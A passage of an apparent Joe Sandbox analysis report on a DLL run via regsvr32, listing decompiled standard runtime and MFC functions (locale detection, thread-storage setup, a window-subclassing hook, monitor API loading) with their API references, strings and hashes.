					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1000A2DF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1000A8D0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x1000aa3a
0x1000aa3b
0x1000aa41
0x1000aa45
0x1000aa4c
0x1000aa52
0x1000aa59
0x1000aa6a
0x1000aa71
0x1000aa74
0x1000aa77
0x1000aa7a
0x1000aa88
0x1000aa8b
0x1000aa8f
0x1000ab5d
0x1000ac19
0x1000ac1d
0x1000ac31
0x1000ac34
0x1000ac3e
0x1000ac44
0x1000ac5c
0x1000ac68
0x1000ac6d
0x1000ac70
0x1000ac70
0x1000ac3e
0x1000ab63
0x1000ab77
0x1000ab82
0x1000ab98
0x1000aba7
0x1000abbf
0x1000abc4
0x1000abca
0x1000abd6
0x1000abd9
0x1000abeb
0x1000abf7
0x1000abfc
0x1000abff
0x1000abff
0x1000abca
0x1000ac09
0x1000ac09
0x1000ab82
0x1000aa95
0x1000aa9d
0x1000aaa0
0x1000aaa3
0x1000aab5
0x1000aabe
0x1000aac6
0x1000aad3
0x1000aad6
0x1000aadd
0x1000aae1
0x1000aae5
0x1000aae8
0x1000aaeb
0x1000aaf8
0x1000ab04
0x1000ab09
0x1000ab0c
0x1000ab0c
0x1000ab13
0x1000ab13
0x1000ab18
0x1000ab1b
0x1000ab32
0x1000ab39
0x1000ab48
0x1000ac7e
0x1000ac85
0x1000ac95
0x1000ac98
0x1000ac9b
0x1000aca2
0x1000aca5
0x1000acac
0x1000acb8
0x1000acc2
0x1000acc7
0x1000acc7
0x1000accc
0x1000acd1
0x1000acee
0x1000acee
0x1000acf5
0x1000acfa
0x00000000
0x1000acd3
0x1000acd3
0x1000acda
0x1000ace2
0x00000000
0x00000000
0x1000ace4
0x1000ace8
0x00000000
0x00000000
0x00000000
0x1000acea
0x1000acec
0x00000000
0x1000acec
0x1000ab4e
0x1000ab4e
0x1000acfc
0x1000acff
0x1000ad07
0x1000ad08
0x1000ad09
0x1000ad1e
0x1000ad1e

APIs

__EH_prolog3.LIBCMT ref: 1000AA59
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
GetVersion.KERNEL32 ref: 1000AB55
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
_sscanf.LIBCMT ref: 1000ABBF
ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 1000ABFA
RegCloseKey.ADVAPI32(?), ref: 1000AC09
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 1000AC6B
_memset.LIBCMT ref: 1000AC85

Strings

GetSystemDefaultUILanguage, xrefs: 1000AACB
Control Panel\Desktop\ResourceLocale, xrefs: 1000AB6D
kernel32.dll, xrefs: 1000AA6C
GetUserDefaultUILanguage, xrefs: 1000AA82
ntdll.dll, xrefs: 1000AC14

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C11B, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1001C11B(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x1005aea4;
					_t40 = TlsSetValue;
					 *0x1005aeb0 = _t7;
					if( *0x1005aea4 == 0) {
						L6:
						 *0x1005aea8 = TlsGetValue;
						 *0x1005aea4 = E1001BDD2;
						 *0x1005aeac = _t40;
						 *0x1005aeb0 = TlsFree;
					} else {
						__eflags =  *0x1005aea8;
						if( *0x1005aea8 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005aeac;
							if( *0x1005aeac == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10057d30 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1005aea8);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10018042();
							 *0x1005aea4 = E1001BD03( *0x1005aea4);
							 *0x1005aea8 = E1001BD03( *0x1005aea8);
							 *0x1005aeac = E1001BD03( *0x1005aeac);
							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
							_t18 = E1001A3D3();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1001BE05();
								goto L15;
							} else {
								_push(E1001BF91);
								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10057d2c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1001E76E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10057d2c);
										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001BE42(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1001BE05();
					return 0;
				}
			}

0x1001c11b
0x1001c127
0x1001c12b
0x1001c14b
0x1001c158
0x1001c165
0x1001c16a
0x1001c16c
0x1001c173
0x1001c179
0x1001c17e
0x1001c196
0x1001c19b
0x1001c1a5
0x1001c1af
0x1001c1b5
0x1001c180
0x1001c180
0x1001c187
0x00000000
0x1001c189
0x1001c189
0x1001c190
0x00000000
0x1001c192
0x1001c192
0x1001c194
0x00000000
0x00000000
0x1001c194
0x1001c190
0x1001c187
0x1001c1ba
0x1001c1c0
0x1001c1c3
0x1001c1c8
0x1001c29a
0x1001c29a
0x1001c29a
0x1001c1ce
0x1001c1d5
0x1001c1d7
0x1001c1d9
0x00000000
0x1001c1df
0x1001c1df
0x1001c1f5
0x1001c205
0x1001c215
0x1001c222
0x1001c227
0x1001c22c
0x1001c22e
0x1001c295
0x1001c295
0x00000000
0x1001c230
0x1001c230
0x1001c241
0x1001c243
0x1001c246
0x1001c24b
0x00000000
0x1001c24d
0x1001c259
0x1001c25b
0x1001c25f
0x00000000
0x1001c261
0x1001c261
0x1001c262
0x1001c276
0x1001c278
0x00000000
0x1001c27a
0x1001c27a
0x1001c27c
0x1001c27d
0x1001c284
0x1001c28a
0x1001c28e
0x1001c292
0x1001c292
0x1001c278
0x1001c25f
0x1001c24b
0x1001c22e
0x1001c1d9
0x1001c29e
0x1001c12d
0x1001c12d
0x1001c135
0x1001c135

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
__mtterm.LIBCMT ref: 1001C12D

Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001E,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
__init_pointers.LIBCMT ref: 1001C1DF
__encode_pointer.LIBCMT ref: 1001C1EA
__encode_pointer.LIBCMT ref: 1001C1FA
__encode_pointer.LIBCMT ref: 1001C20A
__encode_pointer.LIBCMT ref: 1001C21A
__decode_pointer.LIBCMT ref: 1001C23B
__calloc_crt.LIBCMT ref: 1001C254
__decode_pointer.LIBCMT ref: 1001C26E
__initptd.LIBCMT ref: 1001C27D
GetCurrentThreadId.KERNEL32 ref: 1001C284

Strings

FlsAlloc, xrefs: 1001C13D
FlsSetValue, xrefs: 1001C152
FlsGetValue, xrefs: 1001C145
FlsFree, xrefs: 1001C15F
KERNEL32.DLL, xrefs: 1001C11C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011389, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E10017C2A(E1002866E, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a0f5);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1005acbc;
						if( *0x1005acbc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005a8dc;
								if( *0x1005a8dc != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10011245);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E100174D0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1005a8dc = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E100199C1(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000FB9D(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
							__eflags = _t83 - E1001025C;
							if(_t83 != E1001025C) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000CEFC();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1000A7E1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10017C74(_t94, _t105, _t110);
				}
			}

0x10011389
0x10011389
0x10011389
0x10011393
0x10011398
0x1001139b
0x1001139e
0x100113a8
0x100113ae
0x100113b5
0x100113b7
0x100113ba
0x100113c0
0x100113c2
0x100113c4
0x100113c4
0x100113cd
0x100113e2
0x100113e4
0x100113e7
0x100113ec
0x100113ee
0x100113f2
0x100113f8
0x1001140f
0x1001140f
0x10011416
0x10011463
0x10011463
0x10011465
0x100114cd
0x100114d5
0x10011511
0x1001151d
0x10011524
0x10011556
0x10011559
0x1001155f
0x10011561
0x10011564
0x1001156c
0x10011573
0x10011575
0x10011577
0x1001157e
0x10011586
0x10011588
0x1001158b
0x1001158e
0x1001159c
0x1001159c
0x1001158b
0x10011577
0x100115a2
0x100115a8
0x100115b4
0x100115ba
0x100115c1
0x100115c3
0x100115c8
0x100115ce
0x100115ce
0x100115ce
0x100115ce
0x00000000
0x100115d2
0x00000000
0x10011526
0x100114d9
0x100114e4
0x100114ef
0x100114f5
0x100114fb
0x100114fc
0x100114fe
0x10011506
0x10011509
0x1001150f
0x10011535
0x1001153b
0x1001153d
0x00000000
0x00000000
0x10011547
0x1001154b
0x10011550
0x10011554
0x00000000
0x00000000
0x00000000
0x10011554
0x00000000
0x1001150f
0x1001146d
0x10011472
0x10011479
0x10011482
0x10011498
0x1001149a
0x100114a0
0x100114a2
0x100114a4
0x100114a4
0x100114ac
0x100114b0
0x100114b4
0x100114b8
0x100114be
0x100114c1
0x100114c3
0x100114c3
0x00000000
0x100114b8
0x1001141b
0x10011421
0x10011426
0x00000000
0x00000000
0x1001142c
0x1001142f
0x10011434
0x10011441
0x10011445
0x1001144b
0x1001144b
0x10011454
0x10011459
0x1001145c
0x1001145d
0x00000000
0x00000000
0x00000000
0x1001145d
0x100113fa
0x10011401
0x00000000
0x00000000
0x10011407
0x10011409
0x00000000
0x00000000
0x00000000
0x100113cf
0x100113d7
0x100115d4
0x100115d9
0x100115d9

APIs

__EH_prolog3_GS.LIBCMT ref: 10011393

Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F

CallNextHookEx.USER32 ref: 100113D7

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetClassLongA.USER32 ref: 1001141B
GlobalGetAtomNameA.KERNEL32 ref: 10011445
SetWindowLongA.USER32(?,000000FC,Function_0001025C), ref: 1001149A
_memset.LIBCMT ref: 100114E4
GetClassLongA.USER32 ref: 10011514
GetClassNameA.USER32(?,?,00000100), ref: 10011535
GetWindowLongA.USER32 ref: 10011559
GetPropA.USER32 ref: 10011573
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001157E
GetPropA.USER32 ref: 10011586
GlobalAddAtomA.KERNEL32 ref: 1001158E
SetWindowLongA.USER32(?,000000FC,Function_00011245), ref: 1001159C
CallNextHookEx.USER32 ref: 100115B4
UnhookWindowsHookEx.USER32(?), ref: 100115C8

Strings

AfxOldWndProc423, xrefs: 1001156C, 10011571, 1001157C, 10011584, 1001158D
ime, xrefs: 1001144E
#32768, xrefs: 100114F6, 100114FB, 10011545

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6C3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D6C3() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1005a76c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x1005a750 = 0;
						 *0x1005a754 = 0;
						 *0x1005a758 = 0;
						 *0x1005a75c = 0;
						 *0x1005a760 = 0;
						 *0x1005a764 = 0;
						 *0x1005a768 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x1005a750 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1005a754 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x1005a758 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x1005a75c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1005a764 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x1005a760 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x1005a768 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005a76c = 1;
					return _t5;
				} else {
					_t24 =  *0x1005a760; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x1000d6c6
0x1000d6cc
0x1000d6db
0x1000d6e7
0x1000d6f2
0x1000d6f4
0x1000d6f6
0x1000d78a
0x1000d78a
0x1000d790
0x1000d796
0x1000d79c
0x1000d7a2
0x1000d7a8
0x1000d7ae
0x1000d7b4
0x1000d6fc
0x1000d708
0x1000d70a
0x1000d70c
0x1000d711
0x00000000
0x1000d713
0x1000d719
0x1000d71b
0x1000d71d
0x1000d722
0x00000000
0x1000d724
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d733
0x00000000
0x1000d735
0x1000d73b
0x1000d73d
0x1000d73f
0x1000d744
0x00000000
0x1000d746
0x1000d74c
0x1000d74e
0x1000d750
0x1000d755
0x00000000
0x1000d757
0x1000d75d
0x1000d75f
0x1000d761
0x1000d766
0x00000000
0x1000d768
0x1000d76e
0x1000d770
0x1000d772
0x1000d777
0x00000000
0x1000d779
0x1000d77b
0x1000d77b
0x1000d77b
0x1000d777
0x1000d766
0x1000d755
0x1000d744
0x1000d733
0x1000d722
0x1000d711
0x1000d77e
0x1000d789
0x1000d6ce
0x1000d6d0
0x1000d6da
0x1000d6da

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E

Strings

GetMonitorInfoA, xrefs: 1000D757
MonitorFromRect, xrefs: 1000D724
EnumDisplayDevicesA, xrefs: 1000D768
EnumDisplayMonitors, xrefs: 1000D746
MonitorFromWindow, xrefs: 1000D713
MonitorFromPoint, xrefs: 1000D735
USER32, xrefs: 1000D6E2
GetSystemMetrics, xrefs: 1000D702

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20

Uniqueness

